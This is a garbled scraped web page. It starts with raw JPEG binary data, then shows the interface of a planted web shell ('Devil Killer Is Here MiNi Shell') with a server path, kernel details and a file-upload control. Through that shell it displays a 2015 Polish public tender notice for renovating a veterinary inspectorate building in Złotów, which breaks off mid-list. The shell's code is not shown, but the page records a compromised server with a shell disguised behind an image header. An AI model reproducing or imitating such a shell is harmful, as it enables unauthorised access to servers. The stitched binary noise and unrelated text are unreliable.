JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150827/221978-N-2015.html

<p class="kh_header"><b>Złotów: Przebudowa, rozbudowa i nadbudowa ze zmianą sposobu użytkowania budynku byłego internatu na pomieszczenia biurowe oraz budowa garażu pięciostanowiskowego - etap III</b><br>
<b>Numer ogłoszenia: 221978 - 2015; data zamieszczenia: 27.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Inspektorat Weterynarii w Złotowie , ul. 8 Marca 5, 77-400 Złotów, woj. wielkopolskie, tel. 67 263 5154, faks 67 263 51 54.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa, rozbudowa i nadbudowa ze zmianą sposobu użytkowania budynku byłego internatu na pomieszczenia biurowe oraz budowa garażu pięciostanowiskowego - etap III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Budynek biurowy z wejściami: 1.1. Podłoża, podkłady, posadzki i schody zewnętrzne z balustradami - rozbudowa z wejściem: 1) izolacje poziome podposadzkowe i przeciwwilgociowe i przeciwwodne z folii polietylenowej szerokiej, 2) izolacje poziome cieplne i przeciwdźwiękowe z jednej warstwy płyt styropianowych ułożonej na sucho na wierzchu konstrukcji gr. 5 cm, 3) izolacje poziome cieplne i przeciwdźwiękowe z jednej warstwy płyt styropianowych ułożonej na sucho na wierzchu konstrukcji druga warstwa na parterze 5 cm, 4) warstwy wyrównawcze pod posadzki na ogrzewanie podłogowe z zaprawy cementowej grubości 20mm, zatarte na ostro, 5) warstwy wyrównawcze pod posadzki na ogrzewanie podłogowe z zaprawy cementowej - dodatek lub potrącenie za zmianę grubości o 10 mm, 6) posadzka z płytek układanych na klej o wymiarach 40x40cm metodą zwykłą GRES POLEROWANY, 7) stopnie zewnętrzne okładzinowe proste, stopnice grubości 6cm szerokości do 0,5m z elementów ze skał wybuchowych i przeobrażeniowych - analogia okładzina z granitu płomieniowanego, 8) stopnie zewnętrzne okładzinowe proste, podstopnice grubości 6cm szerokości 0,15m z elementów ze skał wybuchowych i przeobrażeniowych - analogia okładzina z granitu polerowanego, 9) posadzki zewnętrzne pełne z elementów prostokątnych ze skał osadowych grubości 6cm układane na zaprawie cementowo-piaskowej - analogia z granitu płomieniowanego, 10) balustrady schodowe prętowe wypełnione przymocowane do policzków śrubami lub spawane - analogia balustrada ze stali nierdzewnej, 1.2. Tynki i okładziny wewnętrzne - rozbudowa z wejściem: 1) tynki jednowarstwowe wewnętrzne grubości 10mm z gipsu tynkarskiego wykonywane mechanicznie na ścianach na podłożu ceramicznym, 2) tynki jednowarstwowe wewnętrzne grubości 10mm z gipsu tynkarskiego wykonywane mechanicznie - dodatek za pogrubienie o 5mm tynków ścian, 3) tynki jednowarstwowe wewnętrzne z gipsu tynkarskiego wyk. mechanicznie gr. 10mm stropów betonowym, 4) tynki jednowarstwowe wewnętrzne z gipsu tynkarskiego wyk. mechanicznie gr. 10mm - dodatek za pogrubienie o 5mm tynków stropów, 5) obudowa słupów na rusztach pojedynczych jednowarstwowa, 6) malowanie dwukrotne wewnętrznych podłoży gipsowych z gruntowaniem, 7) licowanie ścian płytkami na klej o wymiarach około 20x40cm metodą zwykłą. 1.3. Stolarka drzwiowa w całym budynku: 1) ościeżnice drzwiowe wewnętrzne regulowane, 2) skrzydła drzwiowe wewnętrzne wypełnione płytą wiórową otworową bez szkleń, układ pionowy słoi w okleinie 3D, dodatki aluminiowe szerokości 6mm pionowe, klamki i szyldy srebrna patyna, wkładki i klucze srebrne,  3) ościeżnice drzwiowe zewnętrzne zwykłe, 4) skrzydła drzwiowe zewnętrzne pełne, metalowe tłoczone ocieplane, w kolorze stolarki okiennej, 5) montaż sejfu do zabudowy w ścianie o pojemności około 30 dm3, 1.4. Tynki i okładziny wewnętrzne stara część oraz instalacje telekomunikacyjna, rtv, alarmowa i monitoring wewnętrzny w całym budynku: 1) instalacja alarmowa z czujnikami ruchu w całym budynku, 2) instalacja telekomunikacyjna i rtv z gniazdami w całym budynku, 3) instalacja monitoringu wewnętrznego - komunikacja (korytarze, klatka schodowa), 4) obudowy pionów instalacji wod.-kan. i uzupełnienie przejść w stropach w całym budynku, 5) tynki jednowarstwowe wewnętrzne grubości 10mm z gipsu tynkarskiego wykonywane mechanicznie na ścianach na podłożu ceramicznym, 6) tynki jednowarstwowe wewnętrzne grubości 10mm z gipsu tynkarskiego wykonywane mechanicznie - dodatek za pogrubienie o 5mm tynków ścian, 7) tynki (gładzie) jednowarstwowe wewnętrzne z gipsu szpachlowego wyk. ręcznie gr. 3mm stropów na tynku, 8) tynki (gładzie) jednowarstwowe wewnętrzne z gipsu szpachlowego wyk. ręcznie gr. 3mm - dodatek za pogrubienie o 2mm tynków stropów, 9) obudowa słupów na rusztach pojedynczych jednowarstwowa, 10) malowanie dwukrotne wewnętrznych podłoży gipsowych z gruntowaniem, 11) licowanie ścian płytkami na klej o wymiarach około 20x40cm metodą zwykłą, 1.5. Posadzki, schody, balustrada część stara i wejście od podwórka: 1) wykopy ciągłe lub jamiste w gruncie kategorii III ze skarpami o szerokości dna do 1,5m i głębokości do1,5m ze złożeniem urobku na odkład, 2) ławy fundamentowe betonowe prostokątne o szerokości do 0,6m z ręcznym układaniem betonu, 3) podkłady betonowe na podłożu gruntowym z betonu zwykłego, 4) nawierzchnie z kostki betonowej śrutowanej, grubości 80mm na podsypce piaskowej grubości 50mm z wypełnieniem spoin piaskiem, 5) balustrady schodowe prętowe wypełnione, przymocowane do policzków śrubami lub spawane - analogia balustrada ze stali nierdzewnej, na schodach zewnętrznych od podwórka i wewnętrznych w budynku, 6)  okładziny schodów z płytek - przygotowanie podłoża schody zewnętrzne od podwórka i wewnętrzne w budynku, 7) okładziny schodów - GRES POLEROWANY układanych na zaprawie klejowej, 8) cokoliki na schodach z płytek układanych na klej o wysokości 10cm - przygotowanie podłoża, 9) cokoliki na schodach z płytek układanych na klej o wysokości 10 cm z przecinaniem płytek, 10) podkłady betonowe na podłożu gruntowym z betonu zwykłego, 11) izolacje poziome podposadzkowe przeciwwilgociowe i przeciwwodne z folii polietylenowej szerokiej, 12) izolacje poziome cieplne i przeciwdźwiękowe z jednej warstwy płyt styropianowych ułożonej na sucho na parterze grubości 10 cm,13) izolacje poziome cieplne i przeciwdźwiękowe z jednej warstwy płyt styropianowych ułożonej na sucho na wierzchu konstrukcji - piętro grubości 5 cm, 14) warstwy wyrównawcze pod posadzki z zaprawy cementowej grubości 20 mm, zatarte na ostro, 15) warstwy wyrównawcze pod posadzki z zaprawy cementowej - dodatek lub potrącenie za zmianę grubości o 10 mm,  16) posadzka z płytek układanych na klej - przygotowanie podłoża, 17) posadzka z płytek układanych na klej o wymiarach 30x30cm metodą zwykła GRES POLEROWANY, 18) cokoliki o wysokości 10 cm układanych na klej z przecinaniem płytek - przygotowanie podłoża, 19) cokoliki o wysokości 10cm układanych na klej metodą zwykłą z przecinaniem płytek. 1.6. Elewacja i monitoring zewnętrzny: 1) instalacja monitoringu zewnętrznego umożliwiająca obserwację ścian zewnętrznych budynków (biurowego i garaży) i placu pomiędzy budynkami, 2) przygotowanie starego podłoża pod docieplenie metodą lekką - mokrą poprzez oczyszczenie mechaniczne i zmycie, 3) przygotowanie starego podłoża pod docieplenie metodą lekką - mokrą poprzez jednokrotne gruntowanie emulsją, 4) wykonanie cienkowarstwowej wyprawy tynku mineralnego o grubości 2mm na ścianach płaskich i powierzchniach poziomych, 5) licowanie ścian płytkami klinkierowymi na klej o wymiarach 12x24cm, 6) demontaż i montaż oszklenia witryny z wklejeniem folii zasłaniającej w miejscach występowania stropów i przestrzeni dachu oraz obróbka dachu w miejscu połączenia z witryną aluminiową. 2. Wykonanie instalacji gazowej, poprzez: 1) wykopy liniowe pod fundamenty, rurociągi, kolektory w gruntach suchych kat. III-IV z wydobyciem urobku łopatą lub wyciągiem ręcznym głębokości do1,5m, 2) zasypywanie wykopów liniowych o ścianach pionowych głębokości do 1,5m kat. gr. III-IV, 3) montaż rurociągów z rur polietylenowych o śr. nominalnej 32mm z rur w zwojach, 4) oznakowanie trasy gazociągu ułożonego w ziemi taśmą z tworzywa sztucznego, 5) rurociągi instalacji gazowych o średnicy nominalnej 32mm o połączeniach spawanych na ścianach w budynkach mieszkalnych, 6) szafki gazowe natynkowe zewnętrzne dwulicznikowe, 7) dodatek za wykonanie podejścia obustronnego o średnicy przyłącza 32mm do zaworu odcinającego, 8) zawór lub kurek gazowy o średnicy nominalnej 32mm, 9) kocioł gazowy 40 kW-analogia, 10) podejścia do kotła gazowego, 11) zawór lub kurek gazowy o średnicy nominalnej 32mm, 12) próby szczelności instalacji gazowej na ciśnienie dla: przedsiębiorstwa, odbiorcy gazu, i ze zmontowanymi odbiornikami w budynkach niemieszkalnych. 3. Wykonanie instalacji wodociągowej: 1) wodomierze skrzydełkowe o średnicy nominalnej 32mm, 2) filtr osadnikowy siatkowy o średnicy nominalnej 32mm, 3) dodatki za wykonanie obustronnych podejść o średnicy 32mm do wodomierzy skrzydełkowych, 4) rurociągi z rur polipropylenowych o średnicy zewnętrznej 32mm na ścianach w budynkach niemieszkalnych, 5) rurociągi z rur polipropylenowych o średnicy zewnętrznej 25mm na ścianach w budynkach niemieszkalnych, 6) rurociągi z rur polipropylenowych o średnicy zewnętrznej 20mm na ścianach w budynkach niemieszkalnych, 7) rurociągi z rur polipropylenowych o średnicy zewnętrznej 16mm na ścianach w budynkach niemieszkalnych, 8) dodatkowe nakłady na wykonanie podejść do zaworów wypływowych, baterii, hydrantów itp. o średnicy zewnętrznej 16mm, 9) dodatkowe nakłady na wykonanie podejść do spłuczek ustępowych o średnicy zewnętrznej 16mm, 10) baterie umywalkowe lub zmywakowe stojące ze zmieszaczem o średnicy nominalnej 15mm, 11) baterie natryskowe z termostatem o średnicy nominalnej 15mm, 12) zawory czerpalne o średnicy nominalnej 15mm, 13) otuliny termoizolacyjne z pianki PE z nacięciem wzdłużnym gr. 9 mm, średnica zewnętrzna rurociągu 16mm, 14) otuliny termoizolacyjne z pianki PE z nacięciem wzdłużnym gr. 9 mm, średnica zewnętrzna rurociągu 20mm, 15) otuliny termoizolacyjne z pianki PE z nacięciem wzdłużnym gr. 9 mm, średnica zewnętrzna rurociągu 25mm, 16) otuliny termoizolacyjne z pianki PE z nacięciem wzdłużnym gr. 9 mm, średnica zewnętrzna rurociągu 32mm, 17) próba szczelności instalacji wodociągowych o średnicy do 65mm w budynkach niemieszkalnych. 4. Wykonanie instalacji kanalizacyjnej: 1) wykopy liniowe w gruntach suchych o kategorii III-IV o szerokości 0,8-1,5m i głębokości do 3,0m o ścianach pionowych z wydobyciem urobku łopatą lub wyciągiem ręcznym, 2) kanały z rur PVC o średnicy zewnętrznej 160 mm łączone na wcisk, 3) wykopy liniowe w gruntach suchych o kategorii III-IV o szerokości 0,8-1,5m i głębokości do 1,5m o ścianach pionowych z wydobyciem urobku łopatą lub wyciągiem ręcznym, 4) rurociągi PCW o średnicy 160 mm w gotowych wykopach, wewnątrz budynków, 5) rurociągi PCW o średnicy 110 mm na ścianach łączone metodą wciskową, 6) rurociągi PCW o średnicy 75 mm na ścianach łączone metodą wciskową, 7) rurociągi PCW o średnicy 50 mm na ścianach łączone metodą wciskową, 8) dodatek za wykonanie podejść odpływowych z rur i kształtek z nieplastyfikowanego PCW o średnicy 110 mm, 9) dodatek za wykonanie podejść odpływowych z rur i kształtek z nieplastyfikowanego PCW o średnicy 50 mm, 10) montaż kominów wywiewnych, 11) montaż napowietrzacza, 12) montaż ustępów pojedynczych ze spłuczkami podtynkowymi, 13) pisuary pojedyncze z zaworem spłukującym na fotokomórkę, 14) montaż zlewozmywaków żeliwnych lub stalowych na szafce, 15) montaż umywalek pojedynczych porcelanowych z syfonem gruszkowym, 16) montaż brodzików natryskowych z tworzywa sztucznego, 17) kabiny natryskowe 90x90 ze szkła bezpiecznego. 5. Wykonanie instalacji kanalizacji deszczowej: 1) wykopy oraz przekopy w gruncie kategorii III wykonywane na odkład koparkami pr przedsiębiernymi o pojemności łyżki 0,15 m3, 2) studzienki kanalizacyjne systemowe o średnicy 315-425 mm z zamknięciem rurą teleskopową, 3) kanały z rur PVC o średnicy zewnętrznej 160mm łączone na wcisk, 4) zasypanie wykopów spycharkami gąsienicowymi 55kW (75KM) z przemieszczeniem gruntu kategorii I-III na odległość do 10 m, 5) zagęszczenie nasypów z gruntu sypkiego kategorii I-III zagęszczarkami, 6) montaż z podłączeniem osadnika z czyszczakiem rynnowym. 6. Wykonanie instalacji centralnego ogrzewania: 1) przygotowanie instalacji do podłączenia powietrznej pompy ciepła z wyprowadzeniem instalacji na zewnątrz budynku (bez pompy), 2) rurociągi z rur polipropylenowych o średnicy zewnętrznej 40mm na ścianach w budynkach niemieszkalnych, 3) rurociągi z rur polipropylenowych o średnicy zewnętrznej 32mm na ścianach w budynkach niemieszkalnych, 4) rurociągi z rur polipropylenowych o średnicy zewnętrznej 25mm na ścianach w budynkach niemieszkalnych, 5) montaż szafek rozdzielaczowych podtynkowych, 6) montaż rozdzielaczy 10-obwodowych do ogrzewania podłogowego o średnicy nominalnej przyłączy 3/4 16, 7) montaż części instalacyjnej ogrzewania podłogowego w układzie wężownicy ślimakowej z wodą grzewczą o temperaturze od 40/30 do 55/45 stopni Celsjusza z rur o średnicy nominalnej 16 mm i rozstawie 100 mm, 8) montaż części instalacyjnej ogrzewania podłogowego w układzie wężownicy ślimakowej z wodą grzewczą o temperaturze od 40/30 do 55/45 stopni Celsjusza z rur o średnicy nominalnej 16 mm i rozstawie 200 mm, 9) montaż części instalacyjnej ogrzewania podłogowego w układzie wężownicy ślimakowej z wodą grzewczą o temperaturze od 40/30 do 55/45 stopni Celsjusza z rur o średnicy nominalnej 16 mm i rozstawie 300 mm, 10) układy regulacji temperatury bezpośredniego działania - regulator ogrzewania podłogowego indywidulanie dla każdego pomieszczenia, 11) próba szczelności instalacji ogrzewania podłogowego, 12) regulacja ogrzewania podłogowego rurociągów o średnicy nominalnej 16 i 20 mm bez względu na rodzaj układu wężownicy z rur o rozstawie 150 mm, 13) zespoły grzewczo-wentylacyjne nagrzewnice ścienne elektryczne (kurtyny powietrzne) 90cm, 14) grzejniki stalowe dwupłytowe V22 1000/600 - analogia,
15) grzejniki stalowe dwupłytowe V22 500/600 - analogia. 7. Wykonanie klimatyzacji: 1) klimatyzatory ścienne 4 szt. - pomieszczenia biurowe, 2) klimatyzatory ścienne 1 szt. - serwerownia. 8. Wykonanie instalacji elektrycznej na parterze - oświetlenie ENERGOOSZCZĘDNE LEDOWE: 1) mechaniczne wykucie bruzd pod przewody wtynkowe, w podłożu z cegły, 2) przewody kabelkowe w izolacji polwinitowej układane pod tynkiem na podłożu betonowym, w gotowych bruzdach bez ich zaprawiania, 3) montaż na gotowym podłożu puszek podtynkowych o średnicy do 80 mm, mocowanych na zaprawie gipsowej lub cementowej, przy przekroju dołączanego przewodu i ilości wylotów: do 2,5 mm2 - 3 wyloty, 4) montaż na gotowym podłożu, w puszce instalacyjnej łączników podtynkowych rodzaju: łącznik klawiszowy 1-bieg., 5) montaż na gotowym podłożu łączników natynkowych rodzaju: łącznik klawiszy krzyżowy, 6) montaż na gotowym podłożu łączników natynkowych rodzaju: łącznik klawiszowy świecznikowy, 7) montaż na gotowym podłożu łączników natynkowych rodzaju: łącznik klawiszowy schodowy, 8) przygotowanie podłoża betonowego pod oprawy oświetleniowe przykręcane za pomocą 2 kołków kotwiących, 9) kompletowanie opraw   10) oprawy oświetleniowe przykręcane typu LED , 11) oprawy oświetleniowe: oprawa oświetlenia awaryjnego Ew, 12) montaż na gotowym podłożu i podłączenie opraw oświetleniowych LED, rodzaju: przykręcane zewn., 13) montaż opraw oświetleniowych z mod. Aw, 14) oprawy oświetleniowe typu LED typu Downlight (podtynkowe) - opcja, 15) oprawy oświetleniowe przykręcane:   LED 60W , 16) oprawy oświetleniowe przykręcane (zwykłe): z mod. Aw  LED 60W , 17)oprawy oświetleniowe przykręcane (zwykłe): LED 40 W. 9. Wykonanie instalacji elektrycznej na parterze - gniazda 1-f. i 3-f. oraz komputerowe: 1) mechaniczne wykucie bruzd pod przewody wtynkowe, w podłożu z betonu, 2) montaż na gotowym podłożu puszek podtynkowych o średnicy do 80 mm, mocowanych na zaprawie gipsowej lub cementowej, przy przekroju dołączanego przewodu i ilości wylotów: do 2,5mm2 - 3 wyloty, 3) montaż na gotowym podłożu puszek podtynkowych komputerowych, 4) przewody kabelkowe w izolacji polwinitowej układane p.t. na podłożu betonowym, w gotowych bruzdach bez ich zaprawiania, 5) mechaniczne wykucie bruzd pod przewody wtynkowe w podłożu z betonu, 6) rury winidurowe układane p.t. w gotowych bruzdach na podłożu betonowym o średnicy ponad 20 do 28mm, 7) przewody kabelkowe w powłoce polwinitowej wciągane do rur, 8) montaż na gotowym podłożu gniazd wtyczkowych 3-f.400V/16A, 9) montaż na gotowym podłożu gniazd wtyczkowych podtynkowych w puszkach - 2-bieg. z uz.16A, 10) rury winidurowe układane p.t. w gotowych bruzdach, na podłożu betonowym o średnicy ponad 20 do 28mm - pod przewody teletechniczne, 11) przewody teletechniczne wciągane do rur-analogia. 10. Wykonanie rozdzielni głównej RG oraz WLZ: 1) ręczne kopanie rowów dla kabli w gruncie kat. III (25m x 0,8m x 0,4m), 2) nasypanie warstwy piasku na dnie rowu kablowego o szerokości ponad 0,4 do 0,6m, 3) mechaniczne wykucie bruzd pod przewody wtynkowe w podłożu z betonu, 4) rury winidurowe układane p.t. w gotowych bruzdach na podłożu betonowym o średnicy ponad 37 do 47mm, 5) ręczne układanie kabli w rowach kablowych o masie pon. 1,0 do 2,0 kg/m z przykryciem kabli folią z PCW uplast. gr. pow. 0,4-0,6 mm gat. I/II 6) układanie kabli w rurach, pustakach lub kanałach zamkniętych o masie ponad 1,0 do 3,0 kg/m, 7) zagęszczenie nasypów ubijakami mechanicznymi w gruncie spoistym kat. III, 8) ręczne zasypywanie rowów dla kabli w gruncie kat. III, 9) obróbka na sucho kabli na nap. do 1kV o izolacji i powłoce z tworzyw sztucznych -zarobienie na sucho końca kabla 5-żyłowego o przekroju żył ponad 16 do 50 mm2, 10) montaż ręcznego ostrzegacza pożarowego ROP, 11) przygotowanie podłoża do zabudowania aparatów z kuciem mechanicznym otworów pod śruby kotwowe, rodzaj podłoża gipsowe, gazobetonowe - 4 otwory, 12) montaż z przykręceniem konstrukcji do gotowego podłoża, skrzynek lub rozdzielnic o masie ponad 10 do 20 kg (RG), 13) montaż w rozdzielnicach skrzynkowych osprzętu modułowego: rozłączników 3-biegunowych R303 40A, 14) montaż w rozdzielnicach skrzynkowych osprzętu modułowego: wyłączniki nadprądowe 1-biegunowe S301B6A, 15) montaż w rozdzielnicach skrzynkowych osprzętu modułowego: wyłączniki nadprądowe 1-biegunowe S301B10A, 16) montaż w rozdzielnicach skrzynkowych osprzętu modułowego - lampka sygn.. potrójna, 17) zamontowanie w rozdzielnicy modułowej dodatkowego wyposażenia: listwa przyłączeniowa, 18) montaż wył. DPX 125, blok RP, wyzw. wzrost., 19) montaż ochr. p-przep. 4P 15kA 1,2kV, 20) montaż w rozdzielnicach skrzynkowych osprzętu modułowego: włącznik nadprądowy 3-biegunowy S303 B25A,  21) montaż w rozdzielnicach skrzynkowych osprzętu modułowego włącznik nadprądowy 3-biegunowy S303 B40A, 22) montaż UPS 15-20kVA - kalkulacja własna. 11. Wykonanie rozdzielni R1 i Rk-1 na parterze wraz zasilaniem 1) mechaniczne wykucie bruzd pod przewody wtynkowe w podłożu z betonu, 2) rury winidurowe p.t. w gotowych bruzdach na podłożu betonowym o średnicy ponad 20 do 28mm, 3) przewody kablowe w powłoce polwinitowej wciągane do rur, 4) montaż rozdzielni R1 na parterze, 5) montaż w rozdzielnicach skrzynkowych osprzętu modułowego rozłączników 3-biegunowych FRX304 40A, 6) montaż w rozdzielnicach skrzynkowych osprzętu modułowego:- wyłączniki nadprądowe 1-biegunowe S301 B10A, 7) montaż w rozdzielnicach skrzynkowych osprzętu modułowego: wyłączniki nadprądowe 1-biegunowe S301 C10A, 8) montaż w rozdzielnicach skrzynkowych osprzętu modułowego: wyłączniki przeciwpor. 2-biegunowe P312 B16/30mA, 9) montaż w rozdzielnicach skrzynkowych osprzętu modułowego: wyłączniki przeciwpor. 4-biegunowe P304 25A/30mA, 10) montaż w rozdzielnicach skrzynkowych osprzętu modułowego - lampka sygn. potrójna, 11) montaż w rozdzielnicach skrzynkowych osprzętu modułowego: włącznik nadprądowy 3-biegunowy S303 B20A,  12) montaż w rozdzielnicach skrzynkowych osprzętu modułowego: włączniki nadprądowe 1-biegunowe S301 B16A,  13) mechaniczne wykucie w podłożu betonowym wnęki o objętości ponad 0,10 do 0,25 dm3, 14) montaż rozdzielni Rk-1 na parterze, 15) montaż w rozdzielnicach skrzynkowych osprzętu modułowego: rozłączników 3-biegunowych FRX304 40A, 16) montaż w rozdzielnicach skrzydłowych osprzętu modułowego: wyłączniki przeciwpor. 2-biegunowe P312 B16/30mA. 12. Wykonanie instalacji elektrycznej na piętrze wraz z oświetleniem - OŚWETLENIE ENERGOOSZCZĘDNE LEDOWE 1) mechaniczne wykucie bruzd pod przewody wtynkowe w podłożu z cegły, 2) przewody kabelkowe w izolacji polwinitowej układane p.t. na podłożu betonowym w gotowych bruzdach bez ich zaprawiania, 3) montaż na gotowym podłożu puszek podtynkowych o średnicy do 80mm, mocowanych na zaprawie gipsowej lub cementowej, przy przekroju dołączanego przewodu i ilości wylotów: do 2,5mm2 - 3 wyloty, 4) montaż na gotowym podłożu w puszce instalacyjnej łączników podtynkowych rodzaju: łącznik klawiszowy jednobiegunowy, 5) montaż na gotowym podłożu łączników natynkowych rodzaju: łącznik klawiszy krzyżowy, 6) montaż na gotowym podłożu łączników natynkowych rodzaju: łącznik klawiszowy świecznikowy, 7) montaż na gotowym podłożu łączników natynkowych rodzaju: łącznik klawiszowy schodowy, 8) przygotowanie podłoża betonowego pod oprawy oświetleniowe przykręcane za pomocą 2 kołków kotwiących, 9) kompletowanie opraw LED o mocy do 120W, 10) oprawy oświetleniowe przykręcane (zwykłe):  LED 60W, 11) oprawy oświetleniowe: oprawa oświetlenia awaryjnego Ew, 12) oprawy oświetleniowe typu LED typu Downlight podtynkowe - opcja, 13) oprawy oświetleniowe przykręcane   LED 60W, 14) oprawy oświetleniowe przykręcane (zwykłe):   z mod. Aw  LED 60W, 15) montaż na gotowym podłożu i podłączenie opraw oświetleniowych LED 14W, rodzaju: przykręcane (ścienne, kinkiet). 13. Wykonanie instalacji elektrycznej na piętrze: gniazda 1-f. i 3-f. oraz komputerowe 1) mechaniczne wykucie bruzd pod przewody wtynkowe w podłożu z betonu, 2) mechaniczne przebijanie w ścianach lub stropach, z gipsu lub gazobetonu, otworów o długości do 15cm i średnicy 25mm, 3) montaż na gotowym podłożu puszek 